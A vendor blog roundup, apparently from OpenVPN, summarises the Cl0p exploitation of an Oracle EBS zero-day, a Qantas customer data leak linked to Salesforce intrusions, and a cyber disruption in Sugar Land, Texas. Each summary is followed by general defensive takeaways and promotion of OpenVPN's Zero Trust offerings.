Weekend Cybersecurity Roundup: Oracle Exploits, Qantas Leak & More

This past weekend delivered a trio of high-impact incidents that underscore just how wide and deep the risk is — from critical enterprise software to public services and consumer travel.

Oracle EBS Zero-Day & the Cl0p Extortion Wave

On October 10, security researchers disclosed that threat actors tied to the Cl0p ransomware operation had exploited a zero-day vulnerability (CVE-2025-61882) in Oracle’s E-Business Suite (EBS), triggering a data extortion campaign against dozens of organizations dating back to August. 

The attack chain reportedly chained together multiple flaws — SSRF, CRLF injection, authentication bypass — to gain remote code execution on EBS servers and steal sensitive corporate data. Oracle responded by issuing emergency patches, but analysts warn that many organizations remain unpatched and exposed.

This episode is a stark reminder that enterprise software, especially legacy or heavily customized suites like Oracle EBS, remains a prime target. Adversaries are increasingly turning to creative, multi-stage exploit chains instead of relying solely on phishing or social engineering.

Read more about the vulnerability and patch here. 

Takeaway — for IT & security leaders:

• Prioritize patching of Oracle EBS systems, especially internet-facing instances.

• Monitor for indicators of compromise tied to the exploit (e.g. unusual “applmgr” activity, reverse shells via Java payloads).

• Segment and limit access to critical back-end modules (don’t let a compromise cascade across your internal systems).

Not sure if your network security would hold up against this attack? Download the IT Admins' Guide to find out. 

Qantas Data Leak & the Fallout from Salesforce Intrusions

In another bombshell, over 5 million Qantas customers may have had their personal data published on the dark web, following a breach tied to a broader attack on Salesforce systems that we shared with you last week. 

The hacker group Scattered Lapsus$ Hunters (an “umbrella” of sorts combining Scattered Spider, LAPSUS$, ShinyHunters) claims responsibility, listing 39 companies whose Salesforce databases were targeted via social engineering. The stolen fields include names, email addresses, dates of birth, phone numbers, and in some cases home addresses. Importantly, Qantas insists that passwords, financial data, and identity docs were not part of the leak.

The deadline for ransom negotiations expired October 11, and the hackers appear to have followed through by posting the data. The move has reignited scrutiny around SaaS integrity, third-party risk, and the limits of “not our vulnerability” defenses.

Read more here. 

Takeaway — for organizations relying on SaaS:

• Treat access to SaaS platforms as high trust zones. Employ Zero Trust principles even for cloud services.

• Layer multi-factor authentication, conditional access, and adaptive controls for SaaS App Protection (which you can do with OpenVPN).

• Continuously audit and review permissions, especially integrations and API access.

• Monitor threat actor chatter and dark web leaks for mention of your org in SaaS compromise lists.

Local Impact: City of Sugar Land hit by Cyber Disruption

On the municipal front, Sugar Land, Texas experienced a “cyber event” that disrupted its network infrastructure, phone systems, internet, and online payment services. While essential systems (emergency services, utilities) remained operational (thank goodness!), the breach forced the city to suspend late fees and pause utility disconnections.

Recovery is ongoing, investigations are active, and the city has publicly committed to restoring its systems and determining the root cause. 

Read more in the Houston Chronicle. 

This reminds us: even “lower profile” entities like municipalities or utilities are in the crosshairs. Their critical service role makes them high-value targets — and disruption there can cascade quickly into public safety or trust crises.

Takeaway — for local gov & public sector leaders:

• Conduct a rapid risk assessment of critical systems (payments, citizen portals, infrastructure control).

• Maintain robust backup and recovery posture (offline backups, tested restore plans).

• Engage with state/federal cyber incident response resources early (FEMA, CISA, etc.).

• Communicate transparently with residents and stakeholders to manage expectations.

Find out how to prevent attacks by implementing Zero Trust Network Access with a complimentary Gartner report.

Looking ahead — how OpenVPN can help

In the wake of these events, VPNs and secure connectivity tools are more crucial than ever. Here’s where OpenVPN’s story can bolster resilience:

1. Zero Trust Network Access
   Deploying VPNs as part of a Zero Trust architecture helps ensure that even if a user’s credentials are compromised, lateral movement is constrained. Access should be explicitly granted and continuously validated.

2. Secure Remote Access
   As more systems (ERP, SaaS, internal apps) are exposed or cloud-connected, ensuring encrypted, authenticated tunnels to critical services is foundational. OpenVPN can act as a protective layer for those access paths.

3. Defense in Depth
   A VPN by itself doesn’t stop exploits — but combined with patching, segmentation, identity controls, and monitoring, it’s an important boundary in a multi-layer defense stack.

4. Visibility and Control
   OpenVPN allows logging and policy control, giving security teams insight into who’s connecting, from where, and to what — which is essential when investigating incidents like the Oracle or Salesforce breaches.

Final Thoughts 

This past weekend’s headlines serve as a potent reminder: no platform or sector is immune. From global SaaS giants to municipal services and enterprise backbones, attackers are targeting the seams between trust zones.

For security leaders, the imperative is clear:

• Immediately assess exposure to high-risk systems (Oracle, ERP, cloud services).

• Patch, monitor, segment, and limit trust.

• Reexamine your remote access and network boundary strategies — could VPN, zero trust, or micro-segmentation add meaningful protection?